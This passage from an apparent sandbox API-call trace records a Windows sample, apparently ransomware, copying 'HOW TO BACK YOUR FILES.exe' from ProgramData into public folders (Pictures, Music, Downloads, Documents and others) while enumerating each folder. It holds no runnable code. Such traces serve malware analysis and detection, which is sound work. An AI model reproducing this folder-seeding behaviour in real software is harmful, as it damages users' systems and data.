Settings\\Public\\Recorded TV\\Sample Media" | out: lpString1="C:\\Documents and Settings\\Public\\Recorded TV\\Sample Media") returned="C:\\Documents and Settings\\Public\\Recorded TV\\Sample Media" [0078.493] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.493] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Public\\Recorded TV\\Sample Media\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\public\\recorded tv\\sample media\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.493] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0078.493] GetLastError () returned 0x0 [0078.493] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.493] ReadFile (in: hFile=0x118, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.493] CloseHandle (hObject=0x118) returned 1 [0078.493] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0078.493] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.493] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Public\\Recorded TV\\Sample Media\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x4aa3d7e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4aa3d7e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.494] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.494] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.494] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Public\\Pictures", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Public\\Pictures") returned="C:\\Documents and Settings\\Public\\Pictures" [0078.494] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2df8f0 | out: hHeap=0x2b0000) returned 1 [0078.494] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b28 | out: hHeap=0x2b0000) returned 1 [0078.494] lstrlenW (lpString="C:\\Documents and Settings\\Public\\Pictures") returned 41 [0078.494] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Public\\Pictures" | out: lpString1="C:\\Documents and Settings\\Public\\Pictures") returned="C:\\Documents and Settings\\Public\\Pictures" [0078.494] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.494] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Public\\Pictures\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\public\\pictures\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.495] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0078.495] GetLastError () returned 0x0 [0078.495] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.495] ReadFile (in: hFile=0x118, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.495] CloseHandle (hObject=0x118) returned 1 [0078.495] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0078.495] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.495] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Public\\Pictures\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4b96a420, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4b96a420, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.495] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.495] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.495] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Public\\Pictures\\Sample Pictures", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Public\\Pictures\\Sample Pictures") returned="C:\\Documents and Settings\\Public\\Pictures\\Sample Pictures" [0078.495] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1608 | out: hHeap=0x2b0000) returned 1 [0078.495] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b28 | out: hHeap=0x2b0000) returned 1 [0078.495] lstrlenW (lpString="C:\\Documents and Settings\\Public\\Pictures\\Sample Pictures") returned 57 [0078.495] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Public\\Pictures\\Sample Pictures" | out: lpString1="C:\\Documents and Settings\\Public\\Pictures\\Sample Pictures") returned="C:\\Documents and Settings\\Public\\Pictures\\Sample Pictures" [0078.495] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.495] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Public\\Pictures\\Sample Pictures\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\public\\pictures\\sample pictures\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.496] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0078.496] GetLastError () returned 0x0 [0078.496] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.496] ReadFile (in: hFile=0x118, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.496] CloseHandle (hObject=0x118) returned 1 [0078.496] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0078.496] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.496] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Public\\Pictures\\Sample Pictures\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4d6931a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d6931a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.497] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.497] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.497] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Public\\Music", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Public\\Music") returned="C:\\Documents and Settings\\Public\\Music" [0078.497] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ed798 | out: hHeap=0x2b0000) returned 1 [0078.497] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c08 | out: hHeap=0x2b0000) returned 1 [0078.497] lstrlenW (lpString="C:\\Documents and Settings\\Public\\Music") returned 38 [0078.497] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Public\\Music" | out: lpString1="C:\\Documents and Settings\\Public\\Music") returned="C:\\Documents and Settings\\Public\\Music" [0078.497] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.497] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Public\\Music\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\public\\music\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.497] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0078.498] GetLastError () returned 0x0 [0078.498] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.498] ReadFile (in: hFile=0x118, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.498] CloseHandle (hObject=0x118) returned 1 [0078.498] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0078.498] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.498] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Public\\Music\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4f6697e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4f6697e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.498] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.498] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.498] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Public\\Music\\Sample Music", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Public\\Music\\Sample Music") returned="C:\\Documents and Settings\\Public\\Music\\Sample Music" [0078.498] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0078.498] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c08 | out: hHeap=0x2b0000) returned 1 [0078.498] lstrlenW (lpString="C:\\Documents and Settings\\Public\\Music\\Sample Music") returned 51 [0078.498] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Public\\Music\\Sample Music" | out: lpString1="C:\\Documents and Settings\\Public\\Music\\Sample Music") returned="C:\\Documents and Settings\\Public\\Music\\Sample Music" [0078.498] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.498] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Public\\Music\\Sample Music\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\public\\music\\sample music\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.499] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0078.499] GetLastError () returned 0x0 [0078.499] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.499] ReadFile (in: hFile=0x118, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.499] CloseHandle (hObject=0x118) returned 1 [0078.499] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0078.499] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.499] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Public\\Music\\Sample Music\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x521b4800, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x521b4800, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.499] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.499] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.500] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Public\\Libraries", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Public\\Libraries") returned="C:\\Documents and Settings\\Public\\Libraries" [0078.500] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2df890 | out: hHeap=0x2b0000) returned 1 [0078.500] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c48 | out: hHeap=0x2b0000) returned 1 [0078.500] lstrlenW (lpString="C:\\Documents and Settings\\Public\\Libraries") returned 42 [0078.500] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Public\\Libraries" | out: lpString1="C:\\Documents and Settings\\Public\\Libraries") returned="C:\\Documents and Settings\\Public\\Libraries" [0078.500] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.500] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Public\\Libraries\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\public\\libraries\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.500] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0078.500] GetLastError () returned 0x0 [0078.500] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.500] ReadFile (in: hFile=0x118, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.501] CloseHandle (hObject=0x118) returned 1 [0078.501] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0078.501] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.501] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Public\\Libraries\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x530bb2e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x530bb2e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.501] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.501] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.501] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Public\\Favorites", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Public\\Favorites") returned="C:\\Documents and Settings\\Public\\Favorites" [0078.501] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2df830 | out: hHeap=0x2b0000) returned 1 [0078.501] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c68 | out: hHeap=0x2b0000) returned 1 [0078.501] lstrlenW (lpString="C:\\Documents and Settings\\Public\\Favorites") returned 42 [0078.501] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Public\\Favorites" | out: lpString1="C:\\Documents and Settings\\Public\\Favorites") returned="C:\\Documents and Settings\\Public\\Favorites" [0078.501] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.501] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Public\\Favorites\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\public\\favorites\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.502] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0078.502] GetLastError () returned 0x0 [0078.502] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.502] ReadFile (in: hFile=0x118, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.502] CloseHandle (hObject=0x118) returned 1 [0078.502] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0078.502] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.502] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Public\\Favorites\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x498632e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x498632e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.502] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.502] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.502] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Public\\Downloads", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Public\\Downloads") returned="C:\\Documents and Settings\\Public\\Downloads" [0078.502] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2df7d0 | out: hHeap=0x2b0000) returned 1 [0078.502] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c88 | out: hHeap=0x2b0000) returned 1 [0078.502] lstrlenW (lpString="C:\\Documents and Settings\\Public\\Downloads") returned 42 [0078.502] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Public\\Downloads" | out: lpString1="C:\\Documents and Settings\\Public\\Downloads") returned="C:\\Documents and Settings\\Public\\Downloads" [0078.502] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.502] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Public\\Downloads\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\public\\downloads\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.503] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0078.503] GetLastError () returned 0x0 [0078.503] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.503] ReadFile (in: hFile=0x118, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.503] CloseHandle (hObject=0x118) returned 1 [0078.503] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0078.503] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.503] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Public\\Downloads\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x532d0620, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x532d0620, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.504] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.504] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.504] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Public\\Documents", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Public\\Documents") returned="C:\\Documents and Settings\\Public\\Documents" [0078.504] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2df770 | out: hHeap=0x2b0000) returned 1 [0078.504] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7cc8 | out: hHeap=0x2b0000) returned 1 [0078.504] lstrlenW (lpString="C:\\Documents and Settings\\Public\\Documents") returned 42 [0078.504] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Public\\Documents" | out: lpString1="C:\\Documents and Settings\\Public\\Documents") returned="C:\\Documents and Settings\\Public\\Documents" [0078.504] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.504] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Public\\Documents\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\public\\documents\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.504] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0078.505] GetLastError () returned 0x0 [0078.505] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.505] ReadFile (in: hFile=0x118, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.505] CloseHandle (hObject=0x118) returned 1 [0078.505] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0078.505] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.505] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Public\\Documents\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x53342a40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53342a40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.505] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.505] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.505] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Public\\Documents\\My Videos", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Public\\Documents\\My Videos") returned="C:\\Documents and Settings\\Public\\Documents\\My Videos" [0078.505] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2fe0 | out: hHeap=0x2b0000) returned 1 [0078.505] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c68 | out: hHeap=0x2b0000) returned 1 [0078.505] lstrlenW (lpString="C:\\Documents and Settings\\Public\\Documents\\My Videos") returned 